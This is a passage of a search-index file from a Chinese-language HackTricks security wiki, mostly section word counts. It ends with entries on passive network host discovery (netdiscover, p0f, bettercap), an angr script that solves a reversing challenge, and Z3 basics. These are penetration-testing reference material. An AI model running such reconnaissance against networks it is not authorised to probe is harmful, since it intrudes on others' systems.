ody":46,"breadcrumbs":8,"title":2},"9618":{"body":100,"breadcrumbs":7,"title":1},"9619":{"body":39,"breadcrumbs":7,"title":1},"962":{"body":198,"breadcrumbs":8,"title":2},"9620":{"body":39,"breadcrumbs":4,"title":2},"9621":{"body":204,"breadcrumbs":5,"title":3},"9622":{"body":107,"breadcrumbs":11,"title":9},"9623":{"body":97,"breadcrumbs":3,"title":1},"9624":{"body":62,"breadcrumbs":3,"title":1},"9625":{"body":59,"breadcrumbs":6,"title":4},"9626":{"body":5,"breadcrumbs":8,"title":6},"9627":{"body":16,"breadcrumbs":6,"title":4},"9
628":{"body":15,"breadcrumbs":7,"title":5},"9629":{"body":18,"breadcrumbs":6,"title":4},"963":{"body":82,"breadcrumbs":9,"title":3},"9630":{"body":12,"breadcrumbs":5,"title":3},"9631":{"body":19,"breadcrumbs":8,"title":6},"9632":{"body":8,"breadcrumbs":5,"title":3},"9633":{"body":25,"breadcrumbs":7,"title":5},"9634":{"body":50,"breadcrumbs":7,"title":5},"9635":{"body":90,"breadcrumbs":4,"title":2},"9636":{"body":4,"breadcrumbs":8,"title":6},"9637":{"body":23,"breadcrumbs":5,"title":3},"9638":{"body":71,"breadcrumbs":6,"title":4},"9639":{"body":68,"breadcrumbs":6,"title":4},"964":{"body":169,"breadcrumbs":8,"title":4},"9640":{"body":39,"breadcrumbs":12,"title":5},"9641":{"body":196,"breadcrumbs":7,"title":0},"9642":{"body":4,"breadcrumbs":8,"title":1},"9643":{"body":756,"breadcrumbs":9,"title":2},"9644":{"body":36,"breadcrumbs":7,"title":0},"9645":{"body":39,"breadcrumbs":12,"title":5},"9646":{"body":51,"breadcrumbs":7,"title":0},"9647":{"body":296,"breadcrumbs":9,"title":2},"9648":{"body":674,"breadcrumbs":11,"title":4},"9649":{"body":44,"breadcrumbs":7,"title":0},"965":{"body":39,"breadcrumbs":7,"title":1},"9650":{"body":39,"breadcrumbs":6,"title":2},"9651":{"body":9,"breadcrumbs":5,"title":1},"9652":{"body":0,"breadcrumbs":8,"title":4},"9653":{"body":10,"breadcrumbs":7,"title":3},"9654":{"body":15,"breadcrumbs":7,"title":3},"9655":{"body":0,"breadcrumbs":4,"title":0},"9656":{"body":17,"breadcrumbs":5,"title":1},"9657":{"body":0,"breadcrumbs":6,"title":2},"9658":{"body":6,"breadcrumbs":7,"title":3},"9659":{"body":19,"breadcrumbs":7,"title":3},"966":{"body":0,"breadcrumbs":7,"title":1},"9660":{"body":13,"breadcrumbs":10,"title":6},"9661":{"body":31,"breadcrumbs":5,"title":1},"9662":{"body":51,"breadcrumbs":4,"title":0},"9663":{"body":39,"breadcrumbs":7,"title":2},"9664":{"body":212,"breadcrumbs":5,"title":0},"9665":{"body":358,"breadcrumbs":6,"title":1},"9666":{"body":39,"breadcrumbs":12,"title":6},"9667":{"body":4,"breadcrumbs":9,"title":3},"9668":{"body":87,"bread
crumbs":9,"title":3},"9669":{"body":5,"breadcrumbs":9,"title":3},"967":{"body":6,"breadcrumbs":6,"title":0},"9670":{"body":37,"breadcrumbs":9,"title":3},"9671":{"body":143,"breadcrumbs":11,"title":5},"9672":{"body":195,"breadcrumbs":9,"title":3},"9673":{"body":39,"breadcrumbs":3,"title":1},"9674":{"body":15,"breadcrumbs":2,"title":0},"9675":{"body":2,"breadcrumbs":3,"title":1},"9676":{"body":0,"breadcrumbs":3,"title":1},"9677":{"body":8,"breadcrumbs":3,"title":1},"9678":{"body":2,"breadcrumbs":3,"title":1},"9679":{"body":3,"breadcrumbs":3,"title":1},"968":{"body":79,"breadcrumbs":6,"title":0},"9680":{"body":3,"breadcrumbs":3,"title":1},"9681":{"body":40,"breadcrumbs":3,"title":1},"9682":{"body":39,"breadcrumbs":13,"title":6},"9683":{"body":0,"breadcrumbs":7,"title":0},"9684":{"body":66,"breadcrumbs":9,"title":2},"9685":{"body":6,"breadcrumbs":7,"title":0},"9686":{"body":20,"breadcrumbs":8,"title":1},"9687":{"body":9,"breadcrumbs":9,"title":2},"9688":{"body":10,"breadcrumbs":8,"title":1},"9689":{"body":0,"breadcrumbs":9,"title":2},"969":{"body":19,"breadcrumbs":6,"title":0},"9690":{"body":14,"breadcrumbs":8,"title":1},"9691":{"body":7,"breadcrumbs":8,"title":1},"9692":{"body":35,"breadcrumbs":7,"title":0},"9693":{"body":41,"breadcrumbs":7,"title":0},"9694":{"body":39,"breadcrumbs":5,"title":0},"9695":{"body":0,"breadcrumbs":5,"title":0},"9696":{"body":0,"breadcrumbs":5,"title":0},"9697":{"body":12,"breadcrumbs":5,"title":0},"9698":{"body":0,"breadcrumbs":5,"title":0},"9699":{"body":3,"breadcrumbs":6,"title":1},"97":{"body":14,"breadcrumbs":3,"title":1},"970":{"body":10,"breadcrumbs":6,"title":0},"9700":{"body":99,"breadcrumbs":6,"title":1},"9701":{"body":434,"breadcrumbs":6,"title":1},"9702":{"body":464,"breadcrumbs":6,"title":1},"9703":{"body":8,"breadcrumbs":6,"title":1},"9704":{"body":8,"breadcrumbs":7,"title":2},"9705":{"body":2,"breadcrumbs":6,"title":1},"9706":{"body":1,"breadcrumbs":5,"title":0},"9707":{"body":35,"breadcrumbs":5,"title":0},"9708":{"body":39,"b
readcrumbs":6,"title":1},"9709":{"body":16,"breadcrumbs":6,"title":1},"971":{"body":31,"breadcrumbs":6,"title":0},"9710":{"body":100,"breadcrumbs":6,"title":1},"9711":{"body":5,"breadcrumbs":6,"title":1},"9712":{"body":82,"breadcrumbs":8,"title":3},"9713":{"body":4,"breadcrumbs":5,"title":0},"9714":{"body":36,"breadcrumbs":8,"title":3},"9715":{"body":43,"breadcrumbs":5,"title":0},"9716":{"body":39,"breadcrumbs":6,"title":0},"9717":{"body":3,"breadcrumbs":6,"title":0},"9718":{"body":2,"breadcrumbs":6,"title":0},"9719":{"body":140,"breadcrumbs":6,"title":0},"972":{"body":47,"breadcrumbs":6,"title":0},"9720":{"body":58,"breadcrumbs":6,"title":0},"9721":{"body":13,"breadcrumbs":6,"title":0},"9722":{"body":0,"breadcrumbs":6,"title":0},"9723":{"body":9,"breadcrumbs":6,"title":0},"9724":{"body":9,"breadcrumbs":7,"title":1},"9725":{"body":9,"breadcrumbs":6,"title":0},"9726":{"body":14,"breadcrumbs":8,"title":2},"9727":{"body":9,"breadcrumbs":8,"title":2},"9728":{"body":9,"breadcrumbs":6,"title":0},"9729":{"body":29,"breadcrumbs":10,"title":4},"973":{"body":70,"breadcrumbs":6,"title":0},"9730":{"body":15,"breadcrumbs":7,"title":1},"9731":{"body":44,"breadcrumbs":6,"title":0},"9732":{"body":39,"breadcrumbs":7,"title":2},"9733":{"body":118,"breadcrumbs":6,"title":1},"9734":{"body":114,"breadcrumbs":11,"title":6},"9735":{"body":66,"breadcrumbs":6,"title":1},"9736":{"body":45,"breadcrumbs":8,"title":3},"9737":{"body":11,"breadcrumbs":7,"title":2},"9738":{"body":46,"breadcrumbs":5,"title":0},"9739":{"body":39,"breadcrumbs":5,"title":1},"974":{"body":128,"breadcrumbs":11,"title":5},"9740":{"body":20,"breadcrumbs":4,"title":0},"9741":{"body":72,"breadcrumbs":6,"title":2},"9742":{"body":0,"breadcrumbs":6,"title":2},"9743":{"body":8,"breadcrumbs":6,"title":2},"9744":{"body":9,"breadcrumbs":6,"title":2},"9745":{"body":2,"breadcrumbs":5,"title":1},"9746":{"body":0,"breadcrumbs":9,"title":5},"9747":{"body":40,"breadcrumbs":8,"title":4},"9748":{"body":0,"breadcrumbs":9,"title":5},"9749":
{"body":136,"breadcrumbs":7,"title":3},"975":{"body":24,"breadcrumbs":6,"title":0},"9750":{"body":142,"breadcrumbs":9,"title":5},"9751":{"body":0,"breadcrumbs":9,"title":5},"9752":{"body":44,"breadcrumbs":6,"title":2},"9753":{"body":39,"breadcrumbs":4,"title":0},"9754":{"body":48,"breadcrumbs":7,"title":3},"9755":{"body":102,"breadcrumbs":4,"title":0},"9756":{"body":109,"breadcrumbs":8,"title":4},"9757":{"body":50,"breadcrumbs":4,"title":0},"9758":{"body":116,"breadcrumbs":9,"title":5},"9759":{"body":65,"breadcrumbs":9,"title":5},"976":{"body":13,"breadcrumbs":7,"title":1},"9760":{"body":156,"breadcrumbs":13,"title":9},"9761":{"body":108,"breadcrumbs":8,"title":4},"9762":{"body":7,"breadcrumbs":5,"title":1},"9763":{"body":69,"breadcrumbs":7,"title":3},"9764":{"body":18,"breadcrumbs":8,"title":4},"9765":{"body":101,"breadcrumbs":6,"title":2},"9766":{"body":103,"breadcrumbs":10,"title":6},"9767":{"body":82,"breadcrumbs":10,"title":6},"9768":{"body":42,"breadcrumbs":11,"title":7},"9769":{"body":51,"breadcrumbs":9,"title":5},"977":{"body":13,"breadcrumbs":7,"title":1},"9770":{"body":35,"breadcrumbs":10,"title":6},"9771":{"body":23,"breadcrumbs":9,"title":5},"9772":{"body":7,"breadcrumbs":6,"title":2},"9773":{"body":65,"breadcrumbs":11,"title":7},"9774":{"body":15,"breadcrumbs":8,"title":4},"9775":{"body":44,"breadcrumbs":8,"title":4},"9776":{"body":19,"breadcrumbs":5,"title":1},"9777":{"body":56,"breadcrumbs":7,"title":3},"9778":{"body":14,"breadcrumbs":4,"title":0},"9779":{"body":37,"breadcrumbs":11,"title":7},"978":{"body":157,"breadcrumbs":6,"title":0},"9780":{"body":39,"breadcrumbs":4,"title":0},"9781":{"body":34,"breadcrumbs":7,"title":3},"9782":{"body":12,"breadcrumbs":4,"title":0},"9783":{"body":12,"breadcrumbs":4,"title":0},"9784":{"body":106,"breadcrumbs":4,"title":0},"9785":{"body":39,"breadcrumbs":6,"title":1},"9786":{"body":74,"breadcrumbs":6,"title":1},"9787":{"body":56,"breadcrumbs":7,"title":2},"9788":{"body":6,"breadcrumbs":9,"title":4},"9789":{"body":38
,"breadcrumbs":13,"title":8},"979":{"body":80,"breadcrumbs":6,"title":0},"9790":{"body":57,"breadcrumbs":6,"title":1},"9791":{"body":39,"breadcrumbs":6,"title":0},"9792":{"body":0,"breadcrumbs":6,"title":0},"9793":{"body":14,"breadcrumbs":6,"title":0},"9794":{"body":147,"breadcrumbs":6,"title":0},"9795":{"body":187,"breadcrumbs":6,"title":0},"9796":{"body":186,"breadcrumbs":6,"title":0},"9797":{"body":222,"breadcrumbs":6,"title":0},"9798":{"body":173,"breadcrumbs":7,"title":1},"9799":{"body":187,"breadcrumbs":6,"title":0},"98":{"body":3,"breadcrumbs":4,"title":2},"980":{"body":39,"breadcrumbs":2,"title":0},"9800":{"body":212,"breadcrumbs":9,"title":3},"9801":{"body":126,"breadcrumbs":7,"title":1},"9802":{"body":173,"breadcrumbs":6,"title":0},"9803":{"body":101,"breadcrumbs":6,"title":0},"9804":{"body":39,"breadcrumbs":6,"title":0},"9805":{"body":0,"breadcrumbs":6,"title":0},"9806":{"body":116,"breadcrumbs":7,"title":1},"9807":{"body":76,"breadcrumbs":6,"title":0},"9808":{"body":113,"breadcrumbs":7,"title":1},"9809":{"body":156,"breadcrumbs":7,"title":1},"981":{"body":1,"breadcrumbs":2,"title":0},"9810":{"body":95,"breadcrumbs":7,"title":1},"9811":{"body":75,"breadcrumbs":6,"title":0},"9812":{"body":219,"breadcrumbs":9,"title":3},"9813":{"body":62,"breadcrumbs":7,"title":1},"9814":{"body":32,"breadcrumbs":8,"title":2},"9815":{"body":77,"breadcrumbs":8,"title":2},"9816":{"body":40,"breadcrumbs":6,"title":0},"9817":{"body":39,"breadcrumbs":6,"title":0},"9818":{"body":0,"breadcrumbs":6,"title":0},"9819":{"body":37,"breadcrumbs":8,"title":2},"982":{"body":1,"breadcrumbs":2,"title":0},"9820":{"body":50,"breadcrumbs":7,"title":1},"9821":{"body":50,"breadcrumbs":10,"title":4},"9822":{"body":44,"breadcrumbs":5,"title":1},"9823":{"body":4,"breadcrumbs":4,"title":0},"9824":{"body":4,"breadcrumbs":5,"title":1},"9825":{"body":4,"breadcrumbs":5,"title":1},"9826":{"body":5,"breadcrumbs":5,"title":1},"9827":{"body":5,"breadcrumbs":5,"title":1},"9828":{"body":6,"breadcrumbs":6,"titl
e":2},"9829":{"body":7,"breadcrumbs":5,"title":1},"983":{"body":0,"breadcrumbs":2,"title":0},"9830":{"body":7,"breadcrumbs":6,"title":2},"9831":{"body":6,"breadcrumbs":5,"title":1},"9832":{"body":41,"breadcrumbs":5,"title":1},"9833":{"body":39,"breadcrumbs":10,"title":2},"9834":{"body":2,"breadcrumbs":8,"title":0},"9835":{"body":47,"breadcrumbs":9,"title":1},"9836":{"body":3,"breadcrumbs":10,"title":2},"9837":{"body":15,"breadcrumbs":11,"title":3},"9838":{"body":0,"breadcrumbs":11,"title":3},"9839":{"body":9,"breadcrumbs":13,"title":5},"984":{"body":0,"breadcrumbs":3,"title":1},"9840":{"body":36,"breadcrumbs":11,"title":3},"9841":{"body":20,"breadcrumbs":9,"title":1},"9842":{"body":22,"breadcrumbs":8,"title":0},"9843":{"body":2,"breadcrumbs":8,"title":0},"9844":{"body":4,"breadcrumbs":8,"title":0},"9845":{"body":16,"breadcrumbs":8,"title":0},"9846":{"body":60,"breadcrumbs":9,"title":1},"9847":{"body":0,"breadcrumbs":8,"title":0},"9848":{"body":1,"breadcrumbs":9,"title":1},"9849":{"body":5,"breadcrumbs":9,"title":1},"985":{"body":8,"breadcrumbs":2,"title":0},"9850":{"body":0,"breadcrumbs":9,"title":1},"9851":{"body":100,"breadcrumbs":10,"title":2},"9852":{"body":2,"breadcrumbs":9,"title":1},"9853":{"body":35,"breadcrumbs":9,"title":1},"9854":{"body":39,"breadcrumbs":8,"title":2},"9855":{"body":5,"breadcrumbs":7,"title":1},"9856":{"body":59,"breadcrumbs":8,"title":2},"9857":{"body":63,"breadcrumbs":9,"title":3},"9858":{"body":100,"breadcrumbs":8,"title":2},"9859":{"body":40,"breadcrumbs":6,"title":0},"986":{"body":0,"breadcrumbs":2,"title":0},"9860":{"body":39,"breadcrumbs":8,"title":1},"9861":{"body":1,"breadcrumbs":7,"title":0},"9862":{"body":0,"breadcrumbs":7,"title":0},"9863":{"body":1,"breadcrumbs":7,"title":0},"9864":{"body":161,"breadcrumbs":7,"title":0},"9865":{"body":350,"breadcrumbs":7,"title":0},"9866":{"body":0,"breadcrumbs":9,"title":2},"9867":{"body":47,"breadcrumbs":8,"title":1},"9868":{"body":39,"breadcrumbs":10,"title":3},"9869":{"body":11,"breadcrumb
s":9,"title":2},"987":{"body":2,"breadcrumbs":3,"title":1},"9870":{"body":23,"breadcrumbs":9,"title":2},"9871":{"body":74,"breadcrumbs":10,"title":3},"9872":{"body":41,"breadcrumbs":7,"title":0},"9873":{"body":0,"breadcrumbs":7,"title":0},"9874":{"body":0,"breadcrumbs":7,"title":0},"9875":{"body":3,"breadcrumbs":7,"title":0},"9876":{"body":21,"breadcrumbs":7,"title":0},"9877":{"body":80,"breadcrumbs":7,"title":0},"9878":{"body":40,"breadcrumbs":7,"title":0},"9879":{"body":39,"breadcrumbs":8,"title":1},"988":{"body":8,"breadcrumbs":5,"title":3},"9880":{"body":2,"breadcrumbs":7,"title":0},"9881":{"body":8,"breadcrumbs":7,"title":0},"9882":{"body":0,"breadcrumbs":7,"title":0},"9883":{"body":42,"breadcrumbs":7,"title":0},"9884":{"body":1,"breadcrumbs":7,"title":0},"9885":{"body":38,"breadcrumbs":7,"title":0},"9886":{"body":92,"breadcrumbs":7,"title":0},"9887":{"body":0,"breadcrumbs":7,"title":0},"9888":{"body":19,"breadcrumbs":7,"title":0},"9889":{"body":11,"breadcrumbs":8,"title":1},"989":{"body":35,"breadcrumbs":6,"title":4},"9890":{"body":166,"breadcrumbs":7,"title":0},"9891":{"body":0,"breadcrumbs":7,"title":0},"9892":{"body":235,"breadcrumbs":7,"title":0},"9893":{"body":40,"breadcrumbs":8,"title":1},"9894":{"body":39,"breadcrumbs":10,"title":3},"9895":{"body":10,"breadcrumbs":9,"title":2},"9896":{"body":440,"breadcrumbs":7,"title":0},"9897":{"body":24,"breadcrumbs":8,"title":1},"9898":{"body":66,"breadcrumbs":7,"title":0},"9899":{"body":4,"breadcrumbs":7,"title":0},"99":{"body":3,"breadcrumbs":3,"title":1},"990":{"body":39,"breadcrumbs":2,"title":0},"9900":{"body":63,"breadcrumbs":7,"title":0},"9901":{"body":128,"breadcrumbs":8,"title":1},"9902":{"body":145,"breadcrumbs":8,"title":1},"9903":{"body":48,"breadcrumbs":7,"title":0},"9904":{"body":196,"breadcrumbs":7,"title":0},"9905":{"body":118,"breadcrumbs":7,"title":0},"9906":{"body":40,"breadcrumbs":7,"title":0},"9907":{"body":39,"breadcrumbs":10,"title":1},"9908":{"body":1,"breadcrumbs":9,"title":0},"9909":{"body"
:8,"breadcrumbs":9,"title":0},"991":{"body":3,"breadcrumbs":2,"title":0},"9910":{"body":1120,"breadcrumbs":9,"title":0},"9911":{"body":31,"breadcrumbs":10,"title":1},"9912":{"body":167,"breadcrumbs":9,"title":0},"9913":{"body":73,"breadcrumbs":11,"title":2},"9914":{"body":29,"breadcrumbs":9,"title":0},"9915":{"body":68,"breadcrumbs":11,"title":2},"9916":{"body":54,"breadcrumbs":9,"title":0},"9917":{"body":202,"breadcrumbs":9,"title":0},"9918":{"body":41,"breadcrumbs":11,"title":2},"9919":{"body":84,"breadcrumbs":9,"title":0},"992":{"body":0,"breadcrumbs":2,"title":0},"9920":{"body":52,"breadcrumbs":9,"title":0},"9921":{"body":16,"breadcrumbs":10,"title":1},"9922":{"body":40,"breadcrumbs":9,"title":0},"9923":{"body":39,"breadcrumbs":11,"title":2},"9924":{"body":115,"breadcrumbs":10,"title":1},"9925":{"body":40,"breadcrumbs":9,"title":0},"9926":{"body":39,"breadcrumbs":12,"title":4},"9927":{"body":2,"breadcrumbs":8,"title":0},"9928":{"body":0,"breadcrumbs":8,"title":0},"9929":{"body":9,"breadcrumbs":8,"title":0},"993":{"body":0,"breadcrumbs":2,"title":0},"9930":{"body":0,"breadcrumbs":8,"title":0},"9931":{"body":4,"breadcrumbs":8,"title":0},"9932":{"body":15,"breadcrumbs":8,"title":0},"9933":{"body":32,"breadcrumbs":8,"title":0},"9934":{"body":73,"breadcrumbs":11,"title":3},"9935":{"body":7,"breadcrumbs":9,"title":1},"9936":{"body":40,"breadcrumbs":8,"title":0},"9937":{"body":40,"breadcrumbs":10,"title":1},"9938":{"body":92,"breadcrumbs":9,"title":0},"9939":{"body":5,"breadcrumbs":9,"title":0},"994":{"body":0,"breadcrumbs":2,"title":0},"9940":{"body":0,"breadcrumbs":10,"title":1},"9941":{"body":17,"breadcrumbs":9,"title":0},"9942":{"body":4,"breadcrumbs":9,"title":0},"9943":{"body":40,"breadcrumbs":9,"title":0},"9944":{"body":39,"breadcrumbs":4,"title":0},"9945":{"body":2,"breadcrumbs":5,"title":1},"9946":{"body":10,"breadcrumbs":6,"title":2},"9947":{"body":0,"breadcrumbs":5,"title":1},"9948":{"body":9,"breadcrumbs":5,"title":1},"9949":{"body":5,"breadcrumbs":6,"title
":2},"995":{"body":2,"breadcrumbs":2,"title":0},"9950":{"body":9,"breadcrumbs":6,"title":2},"9951":{"body":10,"breadcrumbs":5,"title":1},"9952":{"body":49,"breadcrumbs":5,"title":1},"9953":{"body":4,"breadcrumbs":6,"title":2},"9954":{"body":0,"breadcrumbs":6,"title":2},"9955":{"body":9,"breadcrumbs":6,"title":2},"9956":{"body":20,"breadcrumbs":6,"title":2},"9957":{"body":10,"breadcrumbs":7,"title":3},"9958":{"body":23,"breadcrumbs":6,"title":2},"9959":{"body":0,"breadcrumbs":5,"title":1},"996":{"body":3,"breadcrumbs":2,"title":0},"9960":{"body":11,"breadcrumbs":7,"title":3},"9961":{"body":6,"breadcrumbs":7,"title":3},"9962":{"body":2,"breadcrumbs":8,"title":4},"9963":{"body":69,"breadcrumbs":9,"title":5},"9964":{"body":1,"breadcrumbs":5,"title":1},"9965":{"body":28,"breadcrumbs":5,"title":1},"9966":{"body":2,"breadcrumbs":5,"title":1},"9967":{"body":11,"breadcrumbs":5,"title":1},"9968":{"body":7,"breadcrumbs":5,"title":1},"9969":{"body":11,"breadcrumbs":5,"title":1},"997":{"body":0,"breadcrumbs":2,"title":0},"9970":{"body":141,"breadcrumbs":8,"title":4},"9971":{"body":1,"breadcrumbs":6,"title":2},"9972":{"body":37,"breadcrumbs":5,"title":1},"9973":{"body":62,"breadcrumbs":5,"title":0},"9974":{"body":47,"breadcrumbs":5,"title":0},"9975":{"body":0,"breadcrumbs":5,"title":0},"9976":{"body":72,"breadcrumbs":5,"title":0},"9977":{"body":89,"breadcrumbs":5,"title":0},"9978":{"body":42,"breadcrumbs":5,"title":0},"9979":{"body":30,"breadcrumbs":5,"title":0},"998":{"body":0,"breadcrumbs":2,"title":0},"9980":{"body":0,"breadcrumbs":5,"title":0},"9981":{"body":71,"breadcrumbs":5,"title":0},"9982":{"body":21,"breadcrumbs":5,"title":0},"9983":{"body":32,"breadcrumbs":5,"title":0},"9984":{"body":142,"breadcrumbs":5,"title":0},"9985":{"body":27,"breadcrumbs":5,"title":0},"9986":{"body":35,"breadcrumbs":5,"title":0},"9987":{"body":44,"breadcrumbs":8,"title":1},"9988":{"body":56,"breadcrumbs":7,"title":0},"9989":{"body":59,"breadcrumbs":7,"title":0},"999":{"body":0,"breadcrumbs":2,"t
itle":0},"9990":{"body":140,"breadcrumbs":7,"title":0},"9991":{"body":158,"breadcrumbs":7,"title":0},"9992":{"body":119,"breadcrumbs":7,"title":0},"9993":{"body":119,"breadcrumbs":8,"title":1},"9994":{"body":133,"breadcrumbs":7,"title":0},"9995":{"body":152,"breadcrumbs":7,"title":0},"9996":{"body":56,"breadcrumbs":9,"title":2},"9997":{"body":144,"breadcrumbs":7,"title":0},"9998":{"body":155,"breadcrumbs":8,"title":1},"9999":{"body":134,"breadcrumbs":8,"title":1}},"docs":{"0":{"body":"Reading time: 11 minutes Hacktricks 标志和动态设计由 @ppieranacho .","breadcrumbs":"HackTricks » HackTricks","id":"0","title":"HackTricks"},"1":{"body":"bash # Download latest version of hacktricks\\ngit clone https://github.com/HackTricks-wiki/hacktricks # Select the language you want to use\\nexport LANG=\\"master\\" # Leave master for english\\n# \\"af\\" for Afrikaans\\n# \\"de\\" for German\\n# \\"el\\" for Greek\\n# \\"es\\" for Spanish\\n# \\"fr\\" for French\\n# \\"hi\\" for HindiP\\n# \\"it\\" for Italian\\n# \\"ja\\" for Japanese\\n# \\"ko\\" for Korean\\n# \\"pl\\" for Polish\\n# \\"pt\\" for Portuguese\\n# \\"sr\\" for Serbian\\n# \\"sw\\" for Swahili\\n# \\"tr\\" for Turkish\\n# \\"uk\\" for Ukrainian\\n# \\"zh\\" for Chinese # Run the docker container indicating the path to the hacktricks folder\\ndocker run -d --rm --platform linux/amd64 -p 3337:3000 --name hacktricks -v $(pwd)/hacktricks:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \\"mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git config --global --add safe.directory /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\\" 您的本地 HackTricks 副本将在 http://localhost:3337 后 <5 分钟可用(它需要构建书籍,请耐心等待)。","breadcrumbs":"HackTricks » 本地运行 HackTricks","id":"1","title":"本地运行 HackTricks"},"10":{"body":"学习执行漏洞研究、渗透测试和逆向工程所需的技术和技能,以保护移动应用和设备。通过我们的按需课程 掌握 iOS 和 Android 安全 并 获得认证 : On-demand Mobile Security Training | 8kSec 
Academy","breadcrumbs":"HackTricks » 8kSec Academy – 深入的移动安全课程","id":"10","title":"8kSec Academy – 深入的移动安全课程"},"100":{"body":"你可以使用这些工具在已连接的 network 中被动地发现 hosts: bash netdiscover -p\\np0f -i eth0 -p -o /tmp/p0f.log\\n# Bettercap\\nnet.recon on/off #Read local ARP cache periodically\\nnet.show\\nset net.show.meta true #more info","breadcrumbs":"Pentesting Network » Passive","id":"100","title":"Passive"},"1000":{"body":"UTXO,或 未花费交易输出 ,必须在交易中完全花费。如果只有一部分发送到另一个地址,剩余部分将转到新的找零地址。观察者可以假设这个新地址属于发送者,从而损害隐私。","breadcrumbs":"Blockchain & Crypto » UTXO找零地址检测","id":"1000","title":"UTXO找零地址检测"},"10000":{"body":"python # This challenge is the exact same as the first challenge, except that it was\\n# compiled as a static binary. Normally, Angr automatically replaces standard\\n# library functions with SimProcedures that work much more quickly.\\n#\\n# To solve the challenge, manually hook any standard library c functions that\\n# are used. Then, ensure that you begin the execution at the beginning of the\\n# main function. Do not use entry_state.\\n#\\n# Here are a few SimProcedures Angr has already written for you. They implement\\n# standard library functions. 
You will not need all of them:\\n# angr.SIM_PROCEDURES[\'libc\'][\'malloc\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fopen\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fclose\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fwrite\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'getchar\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'strncmp\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'strcmp\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'scanf\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'printf\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'puts\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'exit\']\\n#\\n# As a reminder, you can hook functions with something similar to:\\n# project.hook(malloc_address, angr.SIM_PROCEDURES[\'libc\'][\'malloc\']())\\n#\\n# There are many more, see:\\n# https://github.com/angr/angr/tree/master/angr/procedures/libc import angr\\nimport sys def main(argv):\\npath_to_binary = argv[1]\\nproject = angr.Project(path_to_binary) initial_state = project.factory.entry_state() #Find the addresses were the lib functions are loaded in the binary\\n#For example you could find: call 0x804ed80 <__isoc99_scanf>\\nproject.hook(0x804ed40, angr.SIM_PROCEDURES[\'libc\'][\'printf\']())\\nproject.hook(0x804ed80, angr.SIM_PROCEDURES[\'libc\'][\'scanf\']())\\nproject.hook(0x804f350, angr.SIM_PROCEDURES[\'libc\'][\'puts\']())\\nproject.hook(0x8048d10, angr.SIM_PROCEDURES[\'glibc\'][\'__libc_start_main\']()) simulation = project.factory.simgr(initial_state) def is_successful(state):\\nstdout_output = state.posix.dumps(sys.stdout.fileno())\\nreturn \'Good Job.\'.encode() in stdout_output # :boolean def should_abort(state):\\nstdout_output = state.posix.dumps(sys.stdout.fileno())\\nreturn \'Try again.\'.encode() in stdout_output # :boolean simulation.explore(find=is_successful, avoid=should_abort) if simulation.found:\\nsolution_state = simulation.found[0]\\nprint(solution_state.posix.dumps(sys.stdin.fileno()).decode())\\nelse:\\nraise Exception(\'Could not find the solution\') if __name__ == \'__main__\':\\nmain(sys.argv) tip 学习和实践 
AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Angr » Angr - Examples » 静态二进制文件","id":"10000","title":"静态二进制文件"},"10001":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 非常基本地,这个工具将帮助我们找到需要满足某些条件的变量的值,手动计算这些值会非常麻烦。因此,您可以向 Z3 指示变量需要满足的条件,它将找到一些值(如果可能的话)。 一些文本和示例摘自 https://ericpony.github.io/z3py-tutorial/guide-examples.htm","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 基本操作","id":"10001","title":"基本操作"},"10002":{"body":"python #pip3 install z3-solver\\nfrom z3 import *\\ns = Solver() #The solver will be given the conditions x = Bool(\\"x\\") #Declare the symbos x, y and z\\ny = Bool(\\"y\\")\\nz = Bool(\\"z\\") # (x or y or !z) and y\\ns.add(And(Or(x,y,Not(z)),y))\\ns.check() #If response is \\"sat\\" then the model is satifable, if \\"unsat\\" something is wrong\\nprint(s.model()) #Print valid values to satisfy the model","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 布尔值/与/或/非","id":"10002","title":"布尔值/与/或/非"},"10003":{"body":"python from z3 import * x = Int(\'x\')\\ny = Int(\'y\')\\n#Simplify a \\"complex\\" ecuation\\nprint(simplify(And(x + 1 >= 3, x**2 + x**2 + y**2 + 2 >= 5)))\\n#And(x >= 2, 2*x**2 + y**2 >= 3) #Note that Z3 is capable to treat irrational numbers (An irrational algebraic number is a root of a polynomial with 
